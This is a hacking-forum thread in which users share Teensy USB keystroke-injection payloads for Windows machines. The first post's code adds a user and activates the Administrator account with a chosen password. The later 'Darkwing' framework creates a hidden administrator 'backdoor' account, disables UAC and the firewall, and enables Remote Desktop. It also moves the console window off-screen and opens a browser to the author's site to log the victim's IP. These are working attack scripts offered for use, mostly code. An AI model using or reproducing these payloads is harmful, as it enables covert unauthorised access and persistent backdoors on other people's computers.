Jump to content

Recommended Posts

Posted

ok guys here is my first code its very basic and based on code by Benownzu93 so thank you

what it does:

1) adds a new user

2) activates the true Administrator account and changes the password

3) then exits cmd

4) blinks when payload is finished

works with windows 7 but i cant get it to work properly on vista

the timing is all off but the delays i have set are long enough for all the commands to run successfully

thanks and i would love some feedback or ideas for things to add

void setup() {
  delay(4000);
  cmd();
  delay(1000);
  uac();
  delay(1000);
  Keyboard.print("net user MrDucky quackquack /add");
  enter();
  delay(500);
  Keyboard.print("net user administrator * ");
  enter();
  delay(500);
  Keyboard.print("Password");
  enter();
  delay(200);
  Keyboard.print("Password");
  enter();
  delay(500);
  Keyboard.print("net user administrator /active:yes");
  enter();
  delay(500);
  Keyboard.print("exit");
  enter();
} 

void loop() {
    digitalWrite(PIN_D6, LOW);   // LED on
    delay(random(1000));                  // Slow blink
    digitalWrite(PIN_D6, HIGH);  // LED off
    delay(random(1000));
}
void cmd(){
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  Keyboard.print("cmd");
  delay(700);
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(100);
}
void uac(){
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_Y);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();

}
void enter(){
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

Posted
ok guys here is my first code its very basic and based on code by Benownzu93 so thank you

what it does:

1) adds a new user

2) activates the true Administrator account and changes the password

3) then exits cmd

4) blinks when payload is finished

...

Your code looks pretty good. I recommend that you create a library with the most commonly used commands so that you don't have to type the same thing over again. Have you looked at Irongeek's PHUKD library? It could save you some time and memory so that you can have Teensy do lots of other things.

http://www.irongeek.com/i.php?page=securit...y_PHUKD_library

It would be cool if you could also disable the firewall settings, or run some scripts that you have written for the Teensy. :) Good job on what you have so far!

Bits1

  • 2 weeks later...
Posted

You're reinventing the wheel here! My code does the same thing (and more), and does it a bit more elegantly.

// Darkwing v0.1
// USB Ducky Framework for the Teensy 2.0
// by HaDAk
// for the Hak.5 Community -- please contribute, distribute, and credit!

// Variables
  int blinkcount = 0;  
  
// OS X payloads
  char* osx_ips = "ifconfig";
    
// *nix payloads
  char* nix_ips = "ifconfig";  
  
// Windows Payloads
  // Add user "backdoor" with password "p@$$w0rd",
    // add to the local admin group, and hide from the login screen
  char* win_adduser = "net user backdoor p@$$w0rd /add && REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /V backdoor /T REG_DWORD /F /D \"0\" && net localgroup \"Administrators\" backdoor /ADD";
  // Disable UAC
  char* win_disableuac = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v EnableLUA /t REG_DWORD /d 0 /f";
  // Enable Remote Desktop
  char* win_enablerdp = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f";
  // Disable Windows Firewall
  char* win_disablefirewall = "netsh firewall set opmode disable";
  // Launch their browser to your favorite website -- I use this to collect their IP and other system metrics
  char* win_launchwebsite = "start /min www.hadak.org/pwnd-by-a-ducky";
  
void setup() {
  // Blink when the ducky is first plugged in, to verify power to it.
  while(blinkcount < 2){
    blink(50);
    blinkcount++;
  }
  // Windows generally needs a longer delay to enumerate the device.  3000ms is
  // typically sufficient, depending on the speed of the machine. Additionally,
  // the first time the device is plugged it, Windows will need a while to
  // install drivers.  To avoid a really high delay, I recommend unplugging the
  // Ducky, letting Windows install the drivers, then replugging it.
  // The value will probably vary by machine, so experiment to find what works.
  delay(3000);
  blink(50);
  RunWinUACCommand("cmd /Q /D /T:7F /F:OFF /V:OFF /K \"@echo off && mode con:RATE=31 DELAY=0 && mode con:COLS=15 LINES=1 && title . && cls\""); // Vile's better command line: http://www.hak5.org/forums/index.php?showtopic=16505
  //RunGnomeKDECommand("xterm");     // Linux (Gnome/KDE) command line example
  //RunOSXCommand("Terminal.app");   // OS X Command line example
  
  delay(250);
  // Move window off screen
  win_MoveWindow();

  // Administer payload(s)
  Keyboard.print(win_disableuac);
  enter();
  Keyboard.print(win_adduser);
  enter();
  Keyboard.print(win_enablerdp);
  enter();
  Keyboard.print(win_disablefirewall);
  enter();
  Keyboard.print(win_launchwebsite);
  enter();
  Keyboard.print("exit");
  enter();
}

void loop() {
  blink(400);
}

void blink(int time){
  pinMode( PIN_D6, OUTPUT );    // set LED to super bright
  digitalWrite(PIN_D6, HIGH);   // LED on
  delay(time);                  // Slow blink
  digitalWrite(PIN_D6, LOW);    // LED off
  delay(time);
}

void enter(){ // Press the enter key, and release it
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void RunGnomeKDECommand(char *cmd){
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_F2);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(500);
  Keyboard.print(cmd);
  enter();
}

void RunOSXCommand(char *cmd){
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(500);
  Keyboard.print(cmd);
  delay(500);
  enter();
}

//void RunWindowsCommand(char *cmd){
//  Keyboard.set_modifier(MODIFIERKEY_GUI);
//  Keyboard.set_key1(KEY_R);
//  Keyboard.send_now();
//  Keyboard.set_modifier(0);
//  Keyboard.set_key1(0);
//  Keyboard.send_now();
//  delay(500);
//  Keyboard.print(cmd);
//  enter();
//}

void RunWinUACCommand(char *cmd){
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(50);
  Keyboard.print(cmd);
  Keyboard.set_modifier(MODIFIERKEY_CTRL|MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  enter();
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(500);
  Keyboard.set_modifier(KEY_RIGHT);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  enter();
}

void win_MoveWindow(){
  int move = 0;
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("m");
  while(move < 250){
    Keyboard.set_key1(KEY_DOWN);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
    move++;
  }
  enter();
}

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...